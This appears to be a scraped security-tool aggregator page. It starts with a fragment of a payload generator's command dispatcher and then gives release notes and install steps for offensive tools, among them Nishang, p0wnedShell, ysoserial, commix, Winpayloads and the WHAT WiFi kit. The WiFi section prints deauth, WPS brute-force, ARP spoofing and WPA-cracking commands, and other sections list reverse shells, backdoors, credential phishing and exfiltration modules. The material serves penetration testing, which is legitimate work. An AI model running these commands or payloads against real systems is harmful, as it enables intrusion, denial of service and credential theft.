    if not args.attacktype:
        banner()
        logging.info('Please -h or --help for more details')
        sys.exit()

    attacktype = args.attacktype.lower()

    if attacktype == 'ps':
        if args.payload and args.lhost and args.lport:
            generate_powershell_attack(args.payload, args.lhost, args.lport)
        else:
            banner()
            powershell_attack_help()

    elif attacktype == 'mac':
        if args.payload and args.lhost and args.lport:
            powershell_cmd, msfcommand = generate_powershell_attack(args.payload, args.lhost, args.lport)
            generate_macro_attack(powershell_cmd)
        else:
            banner()
            macro_attack_help()

    elif attacktype == 'crt':
        if args.filename:
            generate_cert_attack(args.filename)
        else:
            banner()
            cert_attack_help()

    elif attacktype == 'hta':
        if args.command:
            generate_hta_attack(args.command)
        else:
            banner()
            hta_attack_help()
    else:
        banner()
        logging.info('Please -h or --help for more details')

Source: https://github.com/all3g

SploitKit is a series of scripts I wrote to automate some repetitive or tedius tasks I find I commonly need to perform when writing exploits (specifically: Buffer Overflow Exploits).

Example ScreenCapture sploitkit

Script Lists:
+ Ror Spike
This script (./ror_spike.rb) is a wrapper for the SPIKE fuzzer. It creates spike templates for multiple commands (as specified in the script), and launch spike for each created file. It logs the variable that caused the crash, the command it was using, and prompts you to add a custom comment to the log. Later, you can navigate to the log and view a history of the crashes you found.
+ BadChars
This script (./badchars.rb) is designed to help determine which chars are bad. This script assumes you are working with Olly (or at least, something that results in hex printed in the same format as Olly’s binary paste (e.g. 01 0203 04 05 instead of \x01\x02\x03\x04\x05). Remember, I wrote this to suit me. I’m happy to accept pull requests if anybody would like to contribute to making it a little friendlier for use with other debuggers.
+ MagicCalc
This script (./magic_calc.rb) is designed to help with the calculations required to push encoded shellcode to the stack when dealing with an extremely limited allowed character set. It assumes you know that what we’re doing here is using a register (after it’s been XORd to zero) to calculate the difference between the hex representation of zero to our desired hex code, so that it can be pushed to the stack and executed. If I haven’t articulated this well enough, or you haven’t come across this yet, do some googling for “manually encoding shellcode to bypass character filters”.
+ HexSum
This script (./hexsum.rb) is sort of a sanity check for magic_calc.rb. It confirms the calculations are correct, and then provides the hexcodes in little endian format.

Installation:

git clone https://github.com/tresacton/sploitkit && cd sploitkit
chmod +x *.rb
now, youn run step by step what do you need.

Source: https://github.com/tresacton

Changelog v1.3:
* PowerSploit tools updated.
* Updated Mimikatz to latest version.
* Updated MS14-068 Exploit (Kekeo) to latest version.
* New version of Didier Stevens modification of ReactOS Command Prompt incl. Backup Privileges.
* Added Tater, the PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit.
* Added automation to get a SYSTEM command shell using Token Manipulation (Invoke-TokenManipulation).
* Added automation to find machines in the Domain where Domain Admins are logged into (PowerView).

p0wnedShell v1.2 – PowerShell Runspace Post Exploitation Toolkit.

p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.

What’s inside the runspace:
The following PowerShell tools/functions are included:
+ PowerSploit Invoke-Shellcode
+ PowerSploit Invoke-ReflectivePEInjection
+ PowerSploit Invoke-Mimikatz
+ PowerSploit Invoke-TokenManipulation
+ Veil’s PowerTools PowerUp
+ Veil’s PowerTools PowerView
+ HarmJ0y’s Invoke-Psexec
+ Besimorhino’s PowerCat
+ Nishang Invoke-PsUACme
+ Nishang Invoke-Encode
+ Nishang Get-PassHashes
+ Nishang Invoke-CredentialsPhish
+ Nishang Port-Scan
+ Nishang Copy-VSS
Powershell functions within the Runspace are loaded in memory from Base64 encode strings.

The following Binaries/tools are included:
+ Benjamin DELPY’s Mimikatz
+ Benjamin DELPY’s MS14-068 kekeo Exploit
+ Didier Stevens modification of ReactOS Command Prompt
+ hfiref0x MS15-051 Local SYSTEM Exploit
Binaries are loaded in memory using ReflectivePEInjection (Byte arrays are compressed using Gzip and saved within p0wnedShell as Base64 encoded strings).

How to build:

download *.zip and unzip it
Open your Visual Studio Community
right click p0wnedShell open with Your Visual Studion version..
Build p0wnedShell

Download: p0wnedShell-master.zip | Our Post Before
Source : https://github.com/Cn33liz

formatStringExploiter is an Helper script for working with format string bugs.This tool only supports i386 or x86bits at the moment.

format String Exploiter

Dependencies
+ mkvirtualenv pwntools
+ pip install pwntools
+ pip install prettytable

Usage:

git clone https://github.com/Owlz/formatStringExploiter && cd formatStringExploiter
make

Source: https://github.com/Owlz

802.11 auditing and exploitation tool Release notes for WiFi Hacking Attack Tool (WHAT) v1.0 This is only to be used for educational purposes only. It is illegal to use this program against wireless devices that you do not own

Pre-requisites: a. Kali Linux 2 (32 or 64 bit iso or RPi ARM) b. If using the WHAT-RPi version, please ensure the following repos are in the /etc/apt/sources.list file before installing:

+ deb http://http.kali.org/kali sana main non-free contrib deb-src http://http.kali.org/kali sana main non-free contrib

+ deb http://security.kali.org/kali-security/ sana/updates main contrib non-free deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free This tool has only been run with Kali Linux 2.

what-pro file

WHAT is designed to be an all in one and simplify WiFi exploitaton covering wardriving, WPA, WPS, MiTM, network scanning, exploitation and geolocation There are three versions of WHAT (PRO, WHAT, Pi). All have different capabilities for different outputs. Download whichever version suits your needs best.

To start up:

. you must install WHAT into the /root/ directory of Kali 2. Running the installer will download all the necessary packages you need to use WHAT cd root git clone https://github.com/smoz1986/WHAT-PRO.git cd WHAT(or -PRO or -Pi) ./WHAT-installer.sh 2. Once downloaded go to the ‘WHAT’ icon and click to start WHAT 3. On ‘PRO’ version you will have five options (some of these are deprecated for WHAT and WHAT-Pi versions) 4. As you are using WHAT quite a few blank terminals will pop up. Just minimise these but dont close them as that will close the parent menu/program

+ SURVEY (works with WiFi card as wlan0 only. you will be given prompts when each tab is clicked to suit your needs)

— ‘Start WiFi Survey’ will automatically put the card into monitor and start airodump-ng on survey mode. The start up string is as follows: airodump-ng wlan0mon –gpsd -w /root/airodumplog/$filevar -c $chanvar –wps –write-interval 1 –manufacturer –output-format csv,kismet,netxml,gps

— ‘WiFi Survey (PCAP)’ again this will put the card into monitor mode, however, will be conducting PCAPs rather than just survey, which will be required for any deauths…more on that later. The string run for this is as follows: airodump-ng wlan0mon –beacons –gpsd -w /root/airodumplog/pcap/$filevar –bssid $bssidvar -c $chanvar

–output-format pcap,csv,kismet,netxml –write-interval 1 –wps –manufacturer — ‘WPS survey’ will just run a basic WPS survey of nearby WiFi Access points. Command line is as follows: wash -i wlan0mon -o /root/wpslog/$filevar.log –ignore-fcs

— NMAP will run a scan with the following parameters as follows: nmap -sS -sV -sC -A -O -T$speedvar -p $portvar $ipranvar -v -o /root/nmaplog/$filevar.xml

+ EXPLOIT

— ‘Deauth AP-Client’ will conduct a deauth between an AP and client. Wireshark will fire up too so you can confirm capture of the EAPOL packets. Command is as follows: zireplay-ng -0 $deauthvar -a $bssidvar -c $clientvar wlan0mon

— ‘Deauth AP / DOS’ will conduct a deauth of a target AP only. Wireshark again will be activated. Command line used is as follows: aireplay-ng -0 $deauthvar -a $bssidvar wlan0mon

— ‘WPS’ will run a PIN brute force and Pixie attack on a WPS enabled AP. Command line used is as follows: reaver -i wlan0mon -b $bssidvar -vv -S -P -c $chanvar -d $delvar -o /root/wpslog/wpscrack/$filevar.log

— ‘MITM-Ettercap’ will intiate a MITM by Ettercap. The command line used is as follows: ettercap -T -i $intervar -M arp:remote -d -w /root/etterlog/$filevar.pcap /$routervar//$targetvar/

— ‘AIRCRACK’ will brute force the WPA key captured in any PCAPs acquired from a target AP. All four EAPOLs from an AP and client from a single authentication and a very good wordlist will be required for this to work. Command line is as follows: aircrack-ng -b $bssidvar /root/airodumplog/pcap/$filevar.cap

— ‘Metasploit’ will fire up good old msfconsole for you to employ further at your hearts’ content

+ GEOLOCATION

— ‘GISKISMET (Track)’ will plot out you entire track from your wardriving in a kml file for you to view on GoogleEarth. Command line used is as follows: giskismet -x /root/airodumplog/$netxmlvar.kismet.netxml -q “select * from wireless” -o /root/giskismet/$filevar

— ‘GISKISMET (BSSID)’ will plot out only specific AP’s seen from your wardriving. Command line used is as follows: giskismet -x /root/airodumplog/$nexmlvar.kismet.netxml -q “select * from wireless” –bssid “$bssidvar” -o /root/giskismet/wififilter/$filevar

— ‘Start iSniff’ will start up iSniff GPS. More detail on Hubert3 iSniff-GPS can be found elsewhere on Github. Once iSniff is up and running open up iceweasel and put the following into the url bar: 127.0.0.1:8000/apple-wloc/(MAC Address of target AP)

— ‘Start loc-nogps’ will start up loc-nogps. More detail on haxorthematrix loc-nogps is on Github. This program will incorporate iSniff and Wigle WiFi data in generating the location of AP’s rather than your wardriving GPS track. The html file created will be within /root/WHAT-PRO/geo-tools/loc-nogps if you want to recall or delete it at a later date. A known bug is that if hidden SSIDs are processed in the kismet.netxml data from airodump they may come out as a repetitive string such of ‘&0#;’ if this happens they will need to be removed/amended before loc-nogps will work. The command line used is as follows: ./loc-nogpspy -f /root/airodumplog/$locnvar -o $filevar.html -w COMMUNICATIONS

+ ‘WiFi card power boost’ will boost your WiFi card power. The default with WHAT is 2W. If you want to change the settings go to /root/WHAT-PRO/wifi-boost/wireless-regdb-2014.06.13/db.txt and amend all the values in brackets in the ‘country 00:’ and ‘country BO:’ sections to your desired Tx power. Make sure that your wifi card can accept your power setting, I accept no responsibility if you change the settings to something that will break your card. Once click, and your WiFi card’s Tx power will be boosted

+ ‘GPS’ will start up your attached GPS. This only works with USB attached GPS. + ‘OpenVPN’ will start up OpenVPN if you have the credentials to connect to an active OpenVPN server

Usage:

git clone https://github.com/smoz1986/WHAT-PRO && cd WHAT-PRO

Source: https://github.com/smoz1986

Changelog v0.0.4 borderline-beta:
+ Added Apache Commons Beanutils gadget chain.

ysoserial is a collection of utilities and property-oriented programming “gadget chains” discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

yoserial borderline-beta

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.

Usage & Installation:

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jarz

or
git clone https://github.com/frohoff/ysoserial && cd ysoserial
mvn package
cd target
java -jar ysoserial-0.0.4-all.jar

or

Download : v0.0.4.tar.gz  | v0.0.4.zip | ysoserial-0.0.4-all.jar
Source : https://github.com/frohoff | Our Post Before

Cross Site “Scripter” is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

xsser v1.7b

Features:
+ Automated vectors
+ Different injections: XSS, XSA, XSR, DOM, DCP, Induced…
+ GTK+ Interfaz
+ Wizard helpere
+ Exploiting methods
+ Geomapping
+ HTML5 vectors
+ Encoding bypassers: String.FromCharCode, Unicode, Decimal, Hexadecimal…
+ Special final injections: onMouseMove(), Iframes…
+ Different spoofing methods
+ Etc

xsser gui

XSSer contains ‘exploits’ for this browsers:
– [Chrome]: Google Chrome.
– [IE9.0]: Internet Explorer 9.0.
– [IE8.0]: Internet Explorer 8.0.
– [IE7.0]: Internet Explorer 7.0.
– [IE6.0]: Internet Explorer 6.0.
– [NS8.1-IE]: Netscape 8.1+ in IE rendering engine mode.
– [NS8.1-G]: Netscape 8.1+ in the Gecko rendering engine mode.
– [FF]: Mozilla’s Gecko rendering engine, used by Firefox/Iceweasel.
– [Opera]: Opera.
– [NS4]: Netscape 4.0.

Usage:

wget https://sourceforge.net/projects/xsser/files/xsser_1.7-1.tar.gz
tar xf xsser_1.7-1.tar.gz
cd xsser_1.7-1
cd xsser-public
python setup.py install
./xsser -h
./xsser --gtk (for gui)

Source: http://xsser.03c8.net

Changelog v0.6.4:
+ Added ActiveDirectory directory.
+ Added Get-UnConstrained.ps1 to the ActiveDirectory directory.
+ Added Invoke-Mimikatz (mimikatz version 2.1 alpha 17/02//2016)
+ to the Gather Directory.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Roadmap & Changelog

changelog v0.4b:
* Added: New option “–flush-session” for flushing session files for current target.
* Added: Support to resume to the latest injection points from session file.
* Added: Payload mutation if WAF/IPS/IDS protection is detected.
* Added: Check for existence of WAF/IPS/IDS protection (via error pages).
* Added: The “set” option in “reverse_tcp” which sets a context-specific variable to a value.
Version 0.3b [2015]:
+ Added: Time-relative false-positive identification, which identifies unexpected time delays due to unstable requests.
+ Added: New option “-l”, that parses target and data from HTTP proxy log file (i.e Burp or WebScarab).
+ Added: Check if Powershell is enabled in target host, if the applied option’s payload is requiring the use of PowerShell.
+ Added: New option “–ps-version”, that checks PowerShell’s version number.
+ Replaced: Some powershell-based payloads, have been replaced by new (more solid) ones, so to avoid “Microsoft-IIS” server’s incompatibilities.
+ Added: Support (in MacOSX platforms) for a tab completion in shell options.
+ Added: Undocumented parameter “-InputFormat none” so to avoid “Microsoft-IIS” server’s hang.
+ Added: Ability for identification of “Microsoft-IIS” servers.
+ Added: Statistical checks for time-related (“time-based”/”tempfile-based”) techniques.
+ Added: Support for Windows-based (cmd / powershell) payloads for every injection technique.ng..

commix v0.5b

Version 0.2b [2015]:
+ Added: Support for recalling previous commands.
+ Added: Versions for “nongit” users (vx.xx-nongit-yyyymmdd).
+ Added: Support for a tab completion in shell options.
+ Added: Support for alternative (Python) os-shell in dynamic code evaluation (aka eval-based) technique.
+ Added: Support for PHP/Python meterpreter on “reverse_tcp” shell option.
+ Added: The “reverse_tcp” shell option.
+ Added: The ability to check for default root directories (Apache/Nginx).
+ Added: Support for removal of (txt) shell files (File-based/Tempfile-based).
+ Added: Support for JSON POST data.
+ Added: The “enumeration” and “file-read” results to log file.
+ Added: The ability to get the user’s approval before re-{enumerate/file-read} target.
+ Added: The ability to stop current injection technique and proceed on the next one(s).

Commix-0-3b

Commix (short for [com]mand [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Commix v0.2b-7cc57eb
Example screenCapture Updates commix-v-0.1b : Automated All-in-One OS Command Injection and Exploitation Tool. Has been Tested on: Kali Sana, Windows 7/8.1/10, Debian, Ubuntu, Arch-Linux

Disclaimer :
The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Command Injection Testbeds
A collection of pwnable VMs, that includes web apps vulnerable to command injections.
+ Damn Vulnerable Web App
+ OWASP: Mutillidae
+ bWAPP: bee-box (v1.6)
+ Persistence
+ Pentester Lab: Web For Pentester
+ Pentester Lab: CVE-2014-6271/Shellshock
+ Pentester Lab: Rack Cookies and Commands injection
+ Pentester Academy: Command Injection ISO: 1
+ SpiderLabs: MCIR (ShelLOL)
+ Kioptrix: Level 1.1 (#2)
+ Kioptrix: 2014 (#5)
+ Acid Server: 1
+ Flick: 2
+ w3af-moth
+ commix-testbed

Exploitation Demos:
+ Exploiting DVWA (1.0.8) command injection flaws.
+ Exploiting bWAPP command injection flaws (normal & blind).
+ Exploiting ‘Persistence’ blind command injection flaw.
+ Exploiting shellshock command injection flaws.
+ Upload a PHP shell (i.e. Metasploit PHP Meterpreter) on target host.
+ Upload a Weevely PHP web shell on target host.
+ Exploiting cookie-based command injection flaws.
+ Exploiting user-agent-based command injection flaws.
+ Exploiting referer-based command injection flaws.
+ Rack cookies and commands injection.

Usage

python commix.py [options]

Options:

-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target:

This options has to be provided, to define the target URL.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

Request:

These options can be used, to specify how to connect to the target
URL.

--method=METHOD     HTTP method (GET or POST).
--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Injection:

These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--param=PARAMETER   Parameter(s) to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'boolean-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and boolean-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.

Enumeration :

These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs

Installation:

git clone https://github.com/stasinopoulos/commix
cd commix
python commix.py -h (for helper)
python commix.py --update (for update)

Download : Master.zip | Clone Url
Source : https://github.com/stasinopoulos/ | Our post Before

Changelog 1/3/2016:
+ Windows Reverse Meterpreter HTTPS(Staged)

Winpayloads is a Undetectable Windows Payload Generation.
with option menu:
[1] Windows Reverse Shell(Stageless) [Shellter]
[2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]
[3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]
[4] Windows Reverse Meterpreter HTTPS(Staged)

Installation :

git clone https://github.com/Charliedean/Winpayloads
cd WinPayloads
./setup.sh
./WinPayloads.py

Updates:
cd Winpayloads
git pull origin master

Source : https://github.com/Charliedean | Our Post Before

changelog v3/2/2016 :
+ Updated Metasploit and Meterpreter notes.
+ added 6 MALICIOUS PAYLOADS, Binary:
1. android/meterpreter/reverse_tcp – Run a meterpreter server on Android. Connect back stager.
2. linux/x64/shell_reverse_tcp – Connect back to attacker and spawn a command shell.
3. linux/x86/meterpreter/reverse_tcp – Inject the meterpreter server payload (staged). Connect back to the attacker.
4. osx/x64/shell_reverse_tcp – Connect back to attacker and spawn a command shell.
5. windows/meterpreter/reverse_tcp – Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker.
6. windows/x64/meterpreter/reverse_tcp – Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)

discover

Formerly BackTrack scripts. For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
Features :
– sslscan and sslyze to check for SSL/TLS certificate issues.
– Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
– Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
– Crack wireless networks.
– Parse XML to CSV,
– Scanning CIDR, List, IP or domain.

Download, setup & usage :

If using Kali mini apt-get install windows-binaries
git clone git://github.com/leebaird/discover.git /opt/discover/
All scripts must be ran from this location.
cd /opt/discover/
./setup.sh
./discover.sh

Source : https://github.com/leebaird
our post : http://seclist.us/updates-discover-custom-bash-scripts-to-automate-various-pentesting-tasks-4.html